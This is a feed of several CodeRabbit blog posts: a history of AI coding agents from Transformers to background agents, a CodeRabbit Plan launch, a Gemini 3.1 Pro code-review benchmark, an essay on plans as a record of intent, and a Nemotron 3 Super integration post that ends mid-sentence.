The history of AI coding agents begins before anyone seriously called them agents. In 2017, the *Attention Is All You Need* paper introduced the [Transformer](https://arxiv.org/abs/1706.03762), the architecture that made modern large language models possible. In 2020, [CodeBERT](https://arxiv.org/abs/2002.08155) brought that foundation closer to software development by showing that natural language and programming language could be learned together in a single pretrained system for tasks like code search and documentation generation. These were not agents in the modern sense. They did not open files, run tests, or act inside a development environment. But they established the premise that made everything else possible. Code could be modeled as language, and language models could learn useful representations of how software is written, explained, and transformed. By 2021, that line of research had matured into practical, testable code generation. The [Codex paper](https://arxiv.org/abs/2107.03374) described a GPT model fine-tuned on publicly available code and evaluated with [HumanEval](https://arxiv.org/abs/2107.03374). GitHub announced [Copilot](https://github.blog/news-insights/product-news/introducing-github-copilot-ai-pair-programmer/) on June 29, 2021, and the Codex paper followed on July 7, explicitly noting that a distinct production version of Codex powered Copilot. That detail matters because it marked the bridge LLMs crossed from research artifact to mainstream developer product. ## **Copilot made AI coding feel native** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/187dd8de0fbf5bff977add8a76306735eeaf9dc807a1c83250036707c003072e_e519682e9d.jpg) When Copilot arrived, it did something historically more important than “write code.” It made AI feel native to the act of programming. GitHub described Copilot as an AI pair programmer that could draw context from the code around it and suggest whole lines or even entire functions inside the editor. 
That sounds ordinary now, but in 2021 it was a genuine interface breakthrough. Code generation stopped living in research demos and started living on the editing surface itself, where latency, relevance, and developer trust mattered more than abstract benchmark scores. That is why Copilot accomplished more than a traditional autocomplete tool. Its significance was not just model quality. It was the product decision to put the model directly into the workflow of writing software. GitHub’s later [research](https://github.blog/news-insights/research/research-quantifying-github-copilots-impact-on-developer-productivity-and-happiness/) found that Copilot users completed tasks faster and reported conserving mental effort. In other words, Copilot did not merely show that a model could emit code. It showed that AI assistance could change the process of software development. ## **After autocomplete came intent** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c21ce7e5b11e2859068272d6c3d72ccdbfab9aa054ae5bd1e6339041ebd185dc_4a20966512.jpg) The next important signal came in 2022 and it did not come from an editor. DeepMind’s [AlphaCode](https://deepmind.google/blog/competitive-programming-with-alphacode/) showed that harder programming problems often require something beyond elegant one-shot generation. AlphaCode generated many candidate programs, filtered them aggressively, and leaned on program behavior rather than surface fluency alone. In competitive programming, it reached roughly the level of the median competitor. Historically, AlphaCode mattered because it previewed a principle that later coding agents would rely on constantly. Difficult software tasks are often search problems, not just language problems. Later that same year, [ChatGPT](https://openai.com/index/chatgpt/) made conversational interaction with a model mainstream, and [InstructGPT](https://arxiv.org/abs/2203.02155) had already shown why that mattered. 
Models tuned to follow user intent are more useful than models that merely continue text. In March 2023, [GitHub Copilot X](https://github.blog/news-insights/product-news/github-copilot-x-the-ai-powered-developer-experience/) brought that shift directly into software development with chat, pull request assistance, documentation help, and GPT-4 integration. From that point on, the relationship between developer and machine changed. You no longer had to wait for the right completion to appear. You could explain what you wanted, ask for a refactor, request tests, or ask the system to explain unfamiliar code. ## **Conversation wasn’t enough, the assistant had to see the repo** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e3d1818eab1855e3ceee66c0c1730720e943a0ec4f1e65711dff8f97eee9a3d8_29f6afd04f.png) As soon as coding AI became conversational, a new bottleneck appeared: context. Chat is only as good as what it can retrieve about the project in front of it. GitHub’s [repository indexing](https://docs.github.com/copilot/concepts/indexing-repositories-for-copilot-chat) docs make the shift explicit. Indexing runs in the background, and once an index exists, Copilot Chat can answer questions about the repository in GitHub and in VS Code. This was the moment coding AI stopped acting like a brilliant stranger and started acting more like a coworker who had at least read the codebase. At the same time, open code models started adapting more directly to how programmers actually edit. [SantaCoder](https://huggingface.co/bigcode/santacoder) emphasized fill-in-the-middle generation. [StarCoder](https://huggingface.co/blog/starcoder) pushed the open-model frontier with broader language coverage and longer context. [Code Llama](https://arxiv.org/abs/2308.12950) emphasized infilling and larger input windows. Those details mattered because real developers rarely write left to right from a blank page. 
They insert, patch, refactor, stub, and repair inside existing systems. The training objective was beginning to match the mechanics of software work. ## **An agent is a model that can act** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8ac3f6d55e6421c46e40c5877d19c694c50858692a736c52112933469c0f1fbf_2c5343056c.png) This is where the modern meaning of “agent” starts to crystallize. A coding model becomes a coding agent when it can do more than generate plausible code. It has to inspect files, call tools, run commands, observe failures, and continue. The [ReAct](https://arxiv.org/abs/2210.03629) paper gave the field a crisp conceptual template for interleaving reasoning and action, while [OpenAI’s function calling](https://openai.com/index/function-calling-and-other-api-updates/) made tool use practical as a product and API pattern. Together, they shifted the field from passive generation toward closed-loop interaction with an environment. That idea quickly became concrete. The authors of the [SWE-agent](https://arxiv.org/abs/2405.15793) paper argued that language-model agents needed their own “agent-computer interface” for navigating repositories, editing files, and executing programs. [Devin](https://cognition.ai/blog/introducing-devin) packaged a shell, editor, and browser inside a sandboxed compute environment. [OpenHands](https://docs.openhands.dev/overview/introduction) turned the same thesis into a more open and composable stack that can run locally, in the terminal, or in CI/CD workflows. In each case, the breakthrough was not just better code generation. It was the ability to take an action, inspect the result, and try again. ## **Benchmarks stopped asking for functions and started asking for work** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/40fc8c8924113e3bc4350d4b118d669f708fda9b1b395c7d43d8ba58686624a5_1a2475cec3.png) The benchmarks tell the history in miniature. 
In 2021, HumanEval measured whether a model could synthesize a correct function from a docstring. By 2023, the authors of the SWE-bench paper asked whether a system could resolve real GitHub issues in real repositories. That shift is enormous. The field stopped asking whether a model could produce code that looked competent and started asking whether a system could actually complete software tasks under real constraints. Then the bar rose again. [SWE-bench Verified](https://openai.com/index/introducing-swe-bench-verified/) introduced a human-validated subset for more reliable evaluation. [LiveCodeBench](https://arxiv.org/abs/2403.07974) focused on contamination-free evaluation and explicitly broadened the target to include self-repair, code execution, and test-output prediction. [Terminal-Bench](https://arxiv.org/abs/2601.11868) moved closer still to reality by measuring performance on hard, realistic command-line tasks. Evaluation stopped rewarding code that merely looked plausible and started rewarding systems that could finish real work. ## **The background agent era** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ccbc9431daa56a63090dd8b009420108cbd9f01be1b90689d153b2140ca3f65c_522902c1ba.jpg) By 2025, the category had changed shape again. As of early 2026, GitHub documents two complementary agent experiences. In [VS Code](https://code.visualstudio.com/docs/copilot/overview), you can describe what you want to build and let an agent plan, implement, and verify changes across the project. In GitHub itself, [Copilot coding agent](https://docs.github.com/copilot/concepts/agents/coding-agent/about-coding-agent) works in the background as part of the pull request workflow. You assign work, it makes changes, opens a pull request, and then asks for review. The assistant no longer had to wait at the cursor. The agent could take a task and come back with work product. Other platforms converged on the same pattern. 
Recycling the term Codex, the [OpenAI Codex](https://openai.com/index/introducing-codex/) product was reintroduced in 2025 as a software engineering agent for longer-running tasks, while Google’s [Jules](https://jules.google/docs/) is explicitly framed as an experimental coding agent that integrates with GitHub, works autonomously, and can open pull requests with runnable code and test results inside secure cloud VMs. The cloud sandbox became the natural habitat of the background coding agent. ## **The terminal and the editor became control planes** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a01865839decb90fc7d1f6d1bff9f680b27f549b0e83cc4caec1d44645320fc1_e80eed370d.jpg) The local interface evolved in parallel. [Claude Code](https://code.claude.com/docs/en/overview) is described by Anthropic as an agentic coding tool that reads your codebase, edits files, runs commands, and integrates with development tools. Its [GitHub Actions](https://code.claude.com/docs/en/github-actions) workflow can respond to @claude mentions in issues and pull requests, and Claude Code now supports specialized [subagents](https://code.claude.com/docs/en/sub-agents) for task-specific workflows. [Codex CLI](https://developers.openai.com/codex/cli/) brings OpenAI’s coding agent into the terminal, [GitHub Copilot CLI](https://docs.github.com/en/copilot/how-tos/copilot-cli/use-copilot-cli-agents/overview) is now framed as a terminal-native agent with higher-autonomy modes, and Google’s [Gemini CLI](https://developers.google.com/gemini-code-assist/docs/gemini-cli) powers [Gemini Code Assist agent mode](https://developers.google.com/gemini-code-assist/docs/agent-mode). The terminal stopped being just a shell. It became an operating system for agents. AI-native editors pushed the same logic further. [Cursor](https://cursor.com/docs) describes itself as an AI editor and coding agent. 
Cursor [Agent](https://cursor.com/docs/agent/overview) can complete complex tasks, run terminal commands, and edit code, while [Cloud Agents](https://cursor.com/docs/cloud-agent) run remotely and [Automations](https://cursor.com/blog/automations) can trigger agent work on schedules or events. [Windsurf’s Cascade](https://docs.windsurf.com/windsurf/cascade/cascade) combines planning, code edits, memories, and workflows. The editor was no longer simply where humans wrote code. It became a coordination layer where humans supervise, redirect, and collaborate with agents. ## **Instructions and integrations became infrastructure** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ffeca1665666067b594c02d68169762c0cd47e9d5b667e40b54fbf56bfc39bcf_d8677f2c42.png) Once agents could act, organizations discovered a new problem. How do you make them act like *your* team? That is why instruction files and interoperability protocols became central. [Anthropic introduced](https://www.anthropic.com/news/model-context-protocol) MCP in late 2024 as an open standard for AI applications to connect to external tools and data sources. At the same time, repository instruction files like AGENTS.md gave coding agents a predictable place to find setup steps, testing commands, architectural guidance, and review expectations. OpenAI’s docs say [Codex reads AGENTS.md files before doing any work](https://developers.openai.com/codex/guides/agents-md/). Anthropic’s [CLAUDE.md files and auto memory](https://code.claude.com/docs/en/memory) give Claude persistent project context. GitHub supports repository and organization [custom instructions](https://docs.github.com/en/copilot/how-tos/configure-custom-instructions), and Cursor exposes persistent [Rules](https://cursor.com/docs/rules). Prompt engineering had become something closer to infrastructure. 
This matters historically because it marks another conceptual shift. In the early Copilot era, the prompt was mostly ephemeral: a comment, a function name, a cursor position. In the agent era, the durable instructions matter just as much as the transient request. Teams now encode setup commands, testing rules, code style, escalation paths, and review standards in files that travel with the repository. That is a very different world from “predict the next line.” It is much closer to giving a new teammate an operating manual. ## **What the history actually shows** The cleanest way to describe this history is not as autocomplete getting smarter, but as the systematic decomposition of software engineering into machine-operable layers. First came code models. Then inline generation. Then conversation. Then codebase awareness. Then tool use. Then background execution. Then persistent memory. Then a layer of review and validation. Each breakthrough solved a bottleneck created by the one before it. We began by teaching machines to predict code. We are ending, for the moment, by reorganizing software engineering around machines that can take goals, navigate systems, and produce working changes. ***Interested in trying out AI code reviews? Get a*** [***free 14-day trial.***](https://coderabbit.link/7kZn4T5)

Meet CodeRabbit Plan: Better plans. Faster delivery. Less rework

Konrad Sopala — Wed, 18 Mar 2026 00:00:00 GMT

## The challenge Teams using coding agents need prompts that are clear, specific and context-aware. That's exactly why we built [CodeRabbit Plan](http://coderabbit.ai/issue-planner), a collaborative planning tool that turns vague ideas into agent-ready prompts, whether you're starting from a concept, a ticket, or just a text prompt. Bad prompts cost you – in time, compute and dev hours. Two problems collide here. First, poorly written prompts drag out your SDLC with things like: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a210d2900b3ae248cc538d0075e54214265efe8ae400cfa12c7dbdb80f7481a7_1f3072e9d5.png) Second, crafting high-quality prompts is time-consuming. Teams need to align, clarify and preserve a few components like: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/772c75150cd01e97c335e8fc16078f6d47af7ca0f8de0b43fea552d96c3b5f07_ee8ee143b2.png) ## The solution: CodeRabbit Plan CodeRabbit Issue Planner now becomes Plan. We’re decoupling planning and issue tracking so you can start planning from a concept or a prompt – not just from an existing ticket. [CodeRabbit Plan](http://coderabbit.ai/issue-planner) helps teams using coding agents plan collaboratively and align intent before anyone writes a line of code. It turns vague ideas into well-defined phased plans you can share, review and preserve. Each plan generates editable prompts packed with context from your codebase, tickets, team knowledge base and tools like Notion and Confluence – all powered by CodeRabbit’s context engine. Hand these high-quality prompts to the coding agent of your choice and your team can shorten dev cycles, cut code churn and technical debt, and ship better code. Plan creation now happens through a simple text box. Type a prompt, optionally attach an image and get a full plan back. Apart from that, you can still create plans from issue tracking tools like Linear and Jira. 
## Core capabilities

Whether you’re building features, fixing issues or prototyping an MVP, [CodeRabbit Plan](https://app.coderabbit.ai/planning/new) covers you with a few core capabilities:

* Researching and creating phased plans and tasks
* Generating prompts with context from codebases, knowledge bases, tickets and more
* Chat to revision interface
* Agent prompts handoff

## Get started

CodeRabbit Plan is available today. Just go to the [CodeRabbit website](https://app.coderabbit.ai/planning/new) and give it a try!

Gemini 3.1 Pro for code-related tasks: More focus, higher signal-to-noise

Erfan Al-Hossami — Thu, 12 Mar 2026 00:00:00 GMT

In practice, developers experience AI code review through the comments it leaves on pull requests: how often it finds real issues, how much noise it produces, and how actionable its feedback is.

To answer those questions, we ran a benchmark comparing **Google’s Gemini 3.1 Pro** against our internal review baseline, a proprietary blend of OpenAI and Anthropic models tuned for CodeRabbit’s agentic PR review workflow. Using real pull requests with injected bugs, we measured not just detection rates but the structure and quality of the review comments themselves.

The result reveals a clear trade-off: **Gemini leaves fewer, more focused comments with a higher signal-to-noise ratio, but it also surfaces fewer bugs overall.**

## **Methodology: How we benchmarked Gemini 3.1 Pro**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/47dab2c9037806acd9e7de863ef58bb0cd4ddd4f84ab8fea3a8f609640befa8c_79a9dfd9a1.png)

Our benchmark uses an internal dataset composed of real GitHub pull requests into which specific, known error patterns have been injected. Each error pattern (EP) has a ground-truth description of the issue. A model "passes" an EP if at least one of its review comments directly addresses or surfaces the root cause of the injected bug, either by proposing a concrete fix or by explicitly identifying the risk with an actionable direction.

We used a suite of 25 hard PRs, each seeded with a known EP. Our scoring focuses on:

* Actionable comments only: Comments that get posted (not additional suggestions or outside-diff notes).
* EP PASS (per comment): The comment directly fixes or surfaces the EP.
* Important comments: Either EP PASS or another major/critical real bug.
* Precision: EP PASS ÷ total comments.
* SNR: Important ÷ (total − Important).
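To make the scoring definitions above concrete, here is a minimal Python sketch of how precision and SNR could be computed from a set of labeled comments. The `ReviewComment` class, its field names, and the sample counts are assumptions made purely for illustration; this is not CodeRabbit's benchmark code or data.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ReviewComment:
    """One posted (actionable) comment with hypothetical judge labels."""
    ep_pass: bool          # directly fixes or surfaces the injected error pattern
    other_major_bug: bool  # flags a different major/critical real bug


def is_important(comment: ReviewComment) -> bool:
    # "Important" = EP PASS or another major/critical real bug.
    return comment.ep_pass or comment.other_major_bug


def precision(comments: list[ReviewComment]) -> float:
    # Precision = EP PASS / total comments.
    if not comments:
        raise ValueError("need at least one comment")
    return sum(c.ep_pass for c in comments) / len(comments)


def snr(comments: list[ReviewComment]) -> float:
    # SNR = Important / (total - Important).
    if not comments:
        raise ValueError("need at least one comment")
    important = sum(is_important(c) for c in comments)
    noise = len(comments) - important
    return float("inf") if noise == 0 else important / noise


# Illustrative sample (made-up counts): 3 EP passes, 4 other important
# comments, and 2 minor comments, for 9 comments in total.
sample = (
    [ReviewComment(ep_pass=True, other_major_bug=False)] * 3
    + [ReviewComment(ep_pass=False, other_major_bug=True)] * 4
    + [ReviewComment(ep_pass=False, other_major_bug=False)] * 2
)

print(f"precision = {precision(sample):.1%}")  # prints "precision = 33.3%"
print(f"SNR = {snr(sample):.1f}")              # prints "SNR = 3.5"
```

One consequence of the SNR definition is that it depends only on the share of important comments: a rate r gives SNR = r ÷ (1 − r), so 7 important comments out of 9 yields 7 ÷ 2 = 3.5.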
We compared:

* Gemini 3.1 Pro
* CodeRabbit Production (a proprietary blend of OpenAI and Anthropic models tuned for CodeRabbit’s agentic PR review workflow)

## **Performance results**

### **Coverage and precision**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/0fc5a2c5e231498c01b35b074c3a3871cc50ab6cd166e3c12356b9491ee8bd9f_e4db1f2fec.png)

Gemini 3.1 Pro trails on coverage by 4.3 percentage points. It generates 24% fewer actionable comments while landing a slightly higher proportion of them on target (33.3% vs 29.8%). On raw coverage, Baseline has the edge.

The baseline’s nitpick-level comments detect **2 additional EPs** (+8.7pp) beyond its main comments, whereas Gemini detects no EPs in its nitpick comments.

### **Signal quality**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/c3e0a9559804172a0ddfcb6236257bcf570520d3ac150b80e56ad659873d8737_aa8afcc434.png)

Gemini has a higher important-comment rate (77.8% vs 71.9%) and a better SNR (3.5 vs 2.6). Its comments are more likely to be classified as serious issues. It generates proportionally fewer minor comments than our baseline. On signal quality per comment, Gemini is ahead.

## **The behavioral layer**

Most benchmark posts stop at pass rate and precision. This one doesn't. We ran tone classification on every comment to measure how each model communicates and found a meaningful difference.

### **Tone Profile**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/86ba001794c337a738b0e116866a35923d772720c735bdab29ec27c476f65e0d_0ce4536576.png)

Gemini hedges more (0.229 vs 0.175) but is simultaneously more assertive (0.756 vs 0.703) and more confident (0.947 vs 0.939). This isn't contradictory; it reflects a style where Gemini softens its framing ("you might want to consider…") while its technical conclusions remain decisive. Its comments are longer on average but less likely to include code blocks or diff patches compared to Baseline.
### **The sharpest behavioral finding: Gemini knows when it's right** When we split tone metrics by pass/fail outcome, a strong pattern emerges: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e3ad93260d8a9f78f040207ee48d594b72a332d75ff3450b0ba7e0aaeee30a44_f655d21cdc.png) **Gemini's passing comments are 38% more assertive and 33% longer than its failing ones.** When Gemini catches a bug, it's measurably more decisive, more detailed, and more code-inclusive. Its internal confidence signal is reliable: if Gemini is assertive and long, it's probably right. Baseline shows the same directional pattern but the gap is narrower; its passing and failing comments look more similar to each other. Baseline's code block rate is nearly identical whether the comment passes or fails (88.2% vs 87.5%). Baseline applies effort broadly; Gemini concentrates it. This has a practical implication for teams using these models: **Gemini's comment tone is a useful proxy for comment quality.** A terse, hedged Gemini comment warrants more skepticism than an assertive, code-heavy one. Baseline's comments are more uniformly formatted regardless of accuracy. ## **Where Gemini shines** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/57408f3a3f6671a2d3625dfb127e33c4640ee96cd75a9b688e4a95d547658745_e6aee3752f.png) **Comment density when on target**: On the EPs where both models pass, Gemini's passing comments tend to be more specific. Its average passing comment is 1174 characters, nearly 32% longer than a typical Baseline passing comment (891 chars), and concentrates more on the root cause rather than symptom. ## **Where Gemini falls short** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/45ec75037c5e21b748d5dd1972119a9a0251281a47ed226d592ec78c70efab06_aefc504551.png) **Concurrency and threading (56% vs 78% on 9 EPs)**: This is the critical gap. Nine error patterns covered concurrency bugs, lock misuse, timing dependencies, race conditions, livelock. 
Gemini detected 5; Baseline detected 7. The 22-point gap on the dominant category in this dataset is what drives the coverage difference. ## **Conclusion & Limitations** Gemini 3.1 Pro produces higher-quality, more focused comments with better signal-to-noise, but it covers fewer bugs overall. Its SNR of 3.5 vs 2.6 means a developer reading Gemini's review is less likely to waste time on a low-quality comment. But with 60.9% EP detection vs 65.2% for Baseline, you're leaving more real bugs undetected. For codebases where concurrency bugs are a material risk, that gap matters. One finding worth tracking across future evaluations: **Gemini's internal tone calibration is strong.** Its assertiveness score seems to provide a signal as to whether a comment is likely to address the underlying issue. That said, these findings are scoped. The benchmark covers 25 error patterns across five repositories spanning Python, TypeScript, C/C++, and a mixed-language GitHub Actions codebase, but the error distribution is weighted heavily toward concurrency bugs (9 of 25 EPs), which is both where Gemini struggles most and where the gap is widest. Results may look different on codebases where OOP, transaction-semantic, or other bugs dominate. The tone calibration finding in particular should be validated on a broader error distribution before tone is trusted as an indicator that a comment is likely to be right. * * * *Evaluation conducted February 24, 2026. Baseline: Internal baseline on 25 difficult PRs evaluated for Gemini 3.1 Pro. Tone classification by GPT-5.1. Pass/fail determined by independent LLM judge per comment against ground-truth error description.* ***Interested in trying CodeRabbit? Get a*** [***14-day free trial!***](https://coderabbit.link/0XvQhxZ)

The one thing devs will still read when they stop reading code

Priyanka Kukreja — Thu, 12 Mar 2026 00:00:00 GMT

Code was never meant to be read. We just had no alternative. Consider a real-world example: a production payments service with layered retry logic, idempotency keys, circuit breakers, feature flags, and compliance checks woven through middleware. The control flow may be technically clean and fully tested, but the intent is fragmented across conditionals, decorators, and utility abstractions. A single refund path might span five files and three layers of indirection. The machine sees a deterministic execution graph. A human sees scattered branches and implicit constraints - and has to reconstruct which failure modes were considered acceptable, which were business-critical, and which were accidental side effects. For years, we treated code as the highest form of truth in software. If you wanted to know what a system did, you read the code. If you wanted to verify what was built, you inspected the code. That assumption makes sense when humans are the primary authors. As agents take on more of the authorship - first in frontier teams, soon more broadly - that assumption begins to break. We are not *moving towards* a world where agents write software. Many of us are already living in it. Agents write the code, review the diffs and catch the bugs before a human ever sees them. At [CodeRabbit](https://www.coderabbit.ai/), we review millions of pull requests every month and we’ve seen the ratio of human-written to AI-written code inverting at companies on the frontier. When [we sampled 470 open-source GitHub pull requests](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) for our study earlier this year, we found that 320 were AI-co-authored PRs and 150 human-only PRs. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/56ed2474f3d79bc8e96163f5bc13072886a41ada8c7d204156bb646407861b2a_0fe5719882.png) This growing use of agentic AI will see more features materialize from prompts, instead of sitting in the backlog. 
Migrations that used to take weeks being done overnight. Refactoring that was deprioritized but can now actually be undertaken. And yet a glaring gap has opened up that acceleration alone cannot close. ## **The gap no one talks about** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/853905fb362444f27dfa19745be4756fba4a03183d692e6be59348be296ef7fb_b956af49d6.png) When agent-generated code first hits your codebase, it feels like magic. By the twentieth PR, the system starts to feel opaque. By the fiftieth PR, the team is maintaining an artifact that no one fully understands but everyone is expected to extend. Generated code works like sediment. Plausible at each layer, harder to reason about over time. "Just read the code" stops being serious advice. It becomes a ritual repeated because no better system of record exists. The problem isn't the code quality. The agents write clean, tested, locally-correct code. The problem is *intent*. Some ‘human’ questions that code never answered particularly well: * Why was this pattern chosen? * Which constraints mattered? * What did the agent explicitly decide not to do? * What counts as done? Agents now make this limitation of the code impossible to ignore. ## **Code is the new assembly** There's a useful parallel. In the 1950s, programmers wrote assembly. You had to understand registers, memory addresses, instruction cycles: the full machinery. Then abstraction layers arrived. Today, almost no working programmer writes assembly. It still runs underneath everything, but it's not the *human interface* anymore. Code is the new assembly-level language. It still matters. Production still runs on it and machines still need it. But for humans, code is increasingly too low-level to be the place where most thinking happens. Its job is changing: code becomes the thing the machine executes. Something else becomes the thing the human understands. That something is the **Plan**. 
## **The Plan as system of record** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9c6289be87da4748c350f0317aa60c2b0054e6dd4edf6908605e5b956a3f2449_09fc68f048.png) A good plan captures the *why* before it disappears into the *how*. It records assumptions before they become invisible. It makes tradeoffs legible. It turns constraints into shared context instead of tribal knowledge. It gives humans something they can review, debate, refine, approve, and return to… without reverse-engineering intent from thousands of lines of generated code. This distinction matters most where software work gets genuinely hard. Take the payments migration example: The most important artifact for a staff engineer, a PM, or a security lead isn't the final diff. It's the intent: what must not break, which edge cases are business-critical, how failure should be handled, what tradeoffs were consciously accepted. A plan makes that reviewable before the blast radius becomes real. Or take an incident remediation. After an outage, the worst possible time to reconstruct intent is from code written under pressure. A clear plan-as-record shows what was believed at the time, what mitigations were prioritized, what was deferred, and what "done" actually meant. Or take something like onboarding. A new engineer joining a codebase built heavily with agents over the past year can't just be told to "read the repo." But show them the sequence of plans - what was optimized for, where shortcuts were taken, which constraints came from customers, which assumptions are still open - and confusion becomes understanding. Anywhere the cost of misinterpretation is high, the Plan is more valuable than the implementation details alone. Because the real work isn't generating code. It's preserving meaning. ## **What we're building toward** %[https://www.youtube.com/watch?v=zHlgipben70] The future doesn't belong to prompts, and it doesn't belong to code alone. Prompts are too ephemeral. 
Code will soon be too low-level. The durable layer in between, the one humans can actually reason about, is the plan. The plan is where taste lives. It’s where judgment, accountability, and collaboration live. Code will still be written, more of it than ever. But more and more of that code will be produced by systems faster than us, cheaper than us, and less interested in explaining themselves. If we want software development to remain legible, governable, and collaborative, we need a better artifact for humans to hold onto. That's what we're building with CodeRabbit Issue Planner. [CodeRabbit Issue Planner](https://www.coderabbit.ai/issue-planner) is a tool that helps teams using AI agents plan collaboratively and align intent *before* any code is written. It turns vague issues into shared, reviewable plans and generates editable prompts with context directly from your codebase. But it also functions as a new source of truth that serves as an archive of the choices you made and systems you intended to build. It’s not a nicer prompt box or just another thin wrapper around codegen. It’s a real system of record for intent in the age of agents. Just as a poet looks to their poem as the artifact of what they built, and a chef looks to their dish, developers previously looked to code and/or PRs as the artifact they built. But in this new world, it will not be the code. It will be the Plan - the artifact they will say they built. The plan is what developers will point to and say, “This is what we built.” It is what they will share with their teammates to demonstrate their output. It is what they will be evaluated on. The Plan will be the centerpiece of development work going forward. It is what will go out into the world as the last human touchpoint before the machine takes over. ***Issue Planner is part of CodeRabbit's suite of AI-powered developer tools.*** [***Try it today →***](https://coderabbit.link/LpatZEq)

Faster AI code reviews with NVIDIA Nemotron 3 Super

Sahil Mohan Bansal — Wed, 11 Mar 2026 00:00:00 GMT

TL;DR: NVIDIA Nemotron 3 Super delivers high accuracy and faster throughput in CodeRabbit's self-hosted AI code reviews. We are happy to share that CodeRabbit is expanding its support for the [NVIDIA Nemotron](https://research.nvidia.com/labs/nemotron/Nemotron-3/) family of open models, upgrading from Nemotron 3 Nano to **Nemotron 3 Super** for the context gathering and summarization stage of our AI code review workflow. This upgrade is available for CodeRabbit's self-hosted customers running our container image on their own infrastructure. Nemotron 3 Super is used to power the context gathering and summarization stage before the frontier models from OpenAI and Anthropic are used for deep reasoning and generating review comments for bug fixes. With Nemotron Super, that review foundation just got significantly more capable. ## Upgrading from Nano to Super: Faster context gathering at scale We tested Nemotron 3 Super as a follow-up to our initial [support of Nemotron 3 Nano](https://www.coderabbit.ai/blog/coderabbit-ai-code-reviews-now-support-nvidia-nemotron), where we reported that a blend of open and frontier models allows us to improve the overall speed of context gathering and cost efficiency by routing different parts of the review workflow to the appropriate model family especially in the PR Summarization phase of code reviews. Nemotron 3 Super's larger context window and ability to run multi-token prediction (MTP) made it well-suited for the token-hungry task of context summarization. As our code review workflows grow more agentic and complex, we've run into two constraints that Nemotron 3 Super helps to address. **Context explosion:** Multi-agent workflows generate significantly more tokens than standard interactions because each step requires context from tool outputs, intermediate reasoning, repo signals, and more. Over the course of a long review, this volume of context increases cost and risks goal drift. 
**Thinking tax:** Complex agentic tasks require reasoning at every step, but routing every sub-task to a large frontier model makes the pipeline slow and expensive. The ideal solution is a mix of models where the reasoning model aligns with the type of task without escalating to the heaviest model available. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/84abe8060be9996669e9ee9a553587bd7f2e9700739e1f1f2e00171e8e1e0ef0_feeacf5889.png) *CodeRabbit architecture: using Nemotron Super for context gathering & summarization* This context-building stage is the workhorse of the overall AI code review process, and it runs several times throughout the review workflow. [NVIDIA Nemotron 3 Super](https://developer.nvidia.com/blog/introducing-nemotron-3-super-an-open-hybrid-mamba-transformer-moe-for-agentic-reasoning/) handles these high-efficiency tasks: its large context window (1 million tokens) and fast inference let us gather a lot of data and run several iterations of context summarization and retrieval. Repeating these iterations throughout the code review cycle helps to enhance the review quality and raise the signal-to-noise ratio. ## How Nemotron 3 Super helps with review summaries When you open a Pull Request (PR), CodeRabbit’s code review workflow is triggered, starting with an isolated and secure sandbox environment where CodeRabbit analyzes code from a clone of the repo. In parallel, CodeRabbit pulls in context signals from several sources: * Code and PR index * Linter / Static Application Security Testing (SAST) * Code graph * Coding agent rules files * Custom review rules and Learnings * Issue details (Plan details, Jira / Linear / GitHub tickets) * Public MCP servers * Web search A lot of this context, along with the code diff being analyzed, is used to generate a PR Summary before any review comments are generated. 
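The split described above, with an open model for high-volume context work and frontier models for deep reasoning, can be pictured as a small routing table. The sketch below is purely illustrative: the task names, the model labels, the `MODEL_FOR_TASK` mapping, and the `route` function are all hypothetical and are not CodeRabbit's actual pipeline or configuration.

```python
from enum import Enum


class Task(Enum):
    CONTEXT_GATHERING = "context_gathering"
    SUMMARIZATION = "summarization"
    DEEP_REASONING = "deep_reasoning"
    REVIEW_COMMENTS = "review_comments"


# Hypothetical routing table (an assumption for illustration only):
# token-hungry context work goes to the open model, while
# reasoning-heavy steps go to a frontier model.
MODEL_FOR_TASK = {
    Task.CONTEXT_GATHERING: "nemotron-3-super",
    Task.SUMMARIZATION: "nemotron-3-super",
    Task.DEEP_REASONING: "frontier-model",
    Task.REVIEW_COMMENTS: "frontier-model",
}


def route(task: Task) -> str:
    """Return the hypothetical model label assigned to a task."""
    return MODEL_FOR_TASK[task]
```

Keeping the mapping in one place is what avoids the "thinking tax": only the steps that need heavy reasoning are escalated to the most expensive model.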
![](https://victorious-bubble-f69a016683.media.strapiapp.com/b2bfdb4ff7c2cc0f2fb554e501bb0fcb77afcb522bafbd60b6dee29bb30b97ba_c10357a976.png) *PR Summary generated by CodeRabbit, powered by Nemotron 3 Super* Summarization is at the heart of every code review and is the key to delivering high signal-to-noise in the review comments. Nemotron 3 Super is a 120-billion-parameter open model with 12 billion active parameters at inference. Its hybrid Mixture-of-Experts (MoE) architecture uses transformer layers for reasoning and Mamba layers for the high-volume, repetitive work of context processing during review summarization, which is critical for our code reviews. Predicting multiple tokens simultaneously also resulted in meaningfully faster inference, which speeds up review summarization. All other code review tasks flow downstream from summarization. The faster the review summarization, the faster the overall code review. Nemotron Super delivers much faster performance than Nemotron 3 Nano. Nemotron 3 Super can also hold a large codebase context, including context from external sources (Jira tickets, logs, project requirement docs, etc.), without losing state across long tasks. ## What Super unlocks beyond Nano CodeRabbit now supports Nemotron 3 Super (initially for its self-hosted customers) for the context summarization part of the review workflow, while the frontier models from OpenAI and Anthropic focus on finding hidden bugs. For customers, this means faster PR summarization and faster code reviews without compromising quality. We are also delighted to support the [announcement from NVIDIA today](https://nvidianews.nvidia.com/news/nvidia-expands-open-model-families-to-power-the-next-wave-of-agentic-physical-and-healthcare-ai) about the expansion of its Nemotron family of open models and 